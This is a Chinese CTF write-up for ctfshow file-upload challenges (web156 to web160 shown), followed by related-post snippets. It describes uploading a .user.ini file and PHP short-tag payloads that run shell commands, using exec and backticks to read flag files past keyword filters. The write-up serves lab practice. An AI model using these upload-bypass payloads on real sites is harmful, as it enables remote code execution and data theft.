[ctfshow]web入门——文件上传(web156-web163)
[ctfshow]web入门——文件上传(web156-web163)
[ctfshow]web入门——文件上传
- [ctfshow]web入门——文件上传(web156-web163)
- web156
- 上传.user.ini
- web157
- web158
- web159
- web160
- 上传.user.ini+日志包含
- web161
- web162
- way1:远程文件包含
- way2:session条件竞争包含
- web163
本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!
web156
上传.user.ini
上传口
试了试upload界面有一个默认文件,可以用上传.user.ini的方法
后台应该是屏蔽了很多字符串(php,eval,post
等等),甚至连正常图片都传不上去
试了一下php短标签<? ?>
还可以用
先找一下flag在哪
然后读flag的内容
<? exec("cat ../flag* > 2.txt");?>
访问/upload/,然后再访问/upload/2.txt,看到flag
web157
payload同上题,屏蔽了;
<? exec("cat ../flag* > 2.txt")?>
web158
payload同上题
<? exec("cat ../flag* > 2.txt")?>
web159
payload同上,括号被屏蔽,用反引号执行命令
<? `cat ../flag* > 2.txt` ?>
web160
上传.user.ini+日志包含
过滤了反引号和空格
,没有办法上传危险的函数了
所以利用include文件包含传
[ctfshow]web入门——文件上传(web156-web163)相关推荐
- CTFshow——web入门——文件上传
web入门-文件上传 web151 web152 web153 web154 web155 web156 web157 web158 web159 web160 web161 web162.web16 ...
- CTFshow web入门——文件上传
目录 Web 151 考点:后端无验证,前端校验 Web 152 考点:绕过前端校验 Web 153 考点:文件后缀名,黑名单 Web 154-155 考点:文件内容过滤,过滤关键字是php Web ...
- 2020小迪培训(第21天 WEB 漏洞-文件上传之后端黑白名单绕过)
WEB 漏洞-文件上传之后端黑白名单绕过 前言 文件上传常见验证 后缀名,类型,文件头等 后缀名:黑名单,白名单 黑名单:明确不允许上传的格式后缀 asp php jsp cgi war- 缺陷:在定 ...
- WEB漏洞-文件上传之后端黑白名单绕过
WEB漏洞-文件上传之后端黑白名单绕过 文件上传常见验证:后缀名,类型,文件头 后缀名:黑名单,白名单 黑名单:asp php jsp aspx cgi war- 白名单: txt jpg zip r ...
- 2020小迪培训(第20天WEB 漏洞-文件上传之基础及过滤方式)
WEB 漏洞-文件上传之基础及过滤方式 前言 知识点 什么是文件上传漏洞? 有文件上传不一定存在漏洞 凡是存在文件上传的地方/功能的地方都可以进行文件上传漏洞测试 上传文件操作的代码的完整性.安全性, ...
- ctf-web入门-文件上传
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上传png图片 修改为php 写一个php文件上传一句话木马 可以发现已经成功上传 查看上级目录发现可疑文件 查看flag.php文件内 ...
- 上传文件白名单_十大常见web漏洞——文件上传漏洞
漏洞介绍 在我们浏览网页时,文件上传是非常常见的,比如我们会上传头像.附件.视频等文件,文件上传漏洞通常由于网页代码中的文件上传路径变量过滤不严造成的,如果文件上传功能实现代码没有严格限制用户上传的文 ...
- 用VSCode开发一个asp.net core2.0+angular5项目(5): Angular5+asp.net core 2.0 web api文件上传...
第一部分: http://www.cnblogs.com/cgzl/p/8478993.html 第二部分: http://www.cnblogs.com/cgzl/p/8481825.html 第三 ...
- Stream - Web大文件上传插件
Stream 简介 Stream 是根据某网的文件上传插件加工而来,支持不同平台(Windows, Linux, Mac, Android, iOS)下,主流浏览器(IE7+, Chrome, Fir ...
最新文章
- 一图理解腾讯本次组织结构重大变革的方向和目的
- SAP物料价格评估与成本计算体系
- 图像局部显著性—点特征(SIFT为例)
- python数据格式化后导入数据库_如何为数据库导入重新格式化这个json?
- linux 下/etc/profile、/etc/bashrc、~/.bash_profile、~/.bashrc 的区别
- 实体服务与虚拟服务迎来数字化发展新契机 中关村助力首都全球数字经济标杆城市建设
- 图论 —— 最短路 —— Bellman-Ford 算法与 SPFA
- 从结构到模块!华为提出最新两步搜索的目标检测SM-NAS
- ZetCode Kotlin 教程
- linux编译minix,MINIX对Linux
- linux nsf 扫描,linux 使用NSF 映射远程磁盘目录的实现
- MongoDB管理与监控
- linux命令如何查看某个文件的大小,Linux查看文件大小5个常用命令
- 基于maven自动构建和部署工具-JDeploy
- screen工具使用
- 第一章 分布式计算概述
- 健康的生活规律,美满的人生
- 百度蜘蛛index.php,百度蜘蛛抓的这些404链接,不知道啥链接
- android 定位蓝牙,Android BLE定位应用(蓝牙搜索方法)
- Vue.js:el-input自动获取焦点通过自定义指令实现v-focus
热门文章
- 盘点5大高频移动端场景,你不会用就落后了(内附模板下载)
- java自动生成word,java动态生成word解决方案
- 3轮全向轮正解---41
- 测试主管面试必问合集:get 与 post 的区别
- XP下架设奇迹教程+全套服务套+登陆器+架设PL网站教程
- python 读取行数据_openpyxl读取所有行数据之rows属性
- Android系统自带的层次状态机StateMachine(Hierarchical State Machine)
- java实现单一登录 踢人效果
- 黑客攻击第二次,开redis一瞬间
- 面向订单生产型电子制造企业,如何快速响应客户?